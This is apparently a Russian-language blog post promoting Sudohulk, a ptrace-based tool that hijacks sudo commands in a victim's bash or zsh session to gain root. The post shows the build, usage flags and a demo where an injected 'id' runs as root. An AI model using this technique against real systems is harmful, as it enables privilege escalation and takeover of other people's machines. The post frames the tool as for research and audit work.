Sudohulk попробуйте повысить привилегию изменением команды sudo

Этот инструмент меняет команду sudo, подключая sysall execve с помощью ptrace, протестирован под bash и zsh

Поддерживаемые архитектуры:

  • x86_64
  • x86
  • arm

Как использовать

 # make
cc -Wall -Wextra -O2 -c -o bin/sh_remotedata.o src/sh_remotedata.c
cc -Wall -Wextra -O2 -c -o bin/sh_string.o src/sh_string.c
cc -Wall -Wextra -O2 -c -o bin/sudohulk.o src/sudohulk.c
cc -Wall -Wextra -O2 -o sudohulk bin/sh_remotedata.o bin/sh_string.o bin/sudohulk.o
$ ./sudohulk
sudohulk [-qdk] PID COMMAND [ARGS]

Options:
-q quit when change a command
-d run in background
-k keep original command line (appending to new) 

Заметки

PID = bash или zsh pid

Чтобы присоединить текущую сессию, используйте -d, например:

 # ./sudohulk -qd $$ id 

running in background, pid:20899

 # sudo ls -lah
[sudo] senha para mmxm:
uid=0(root) gid=0(root) grupos=0(root) 

Демо

asciicast

Скачать Sudohulk

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *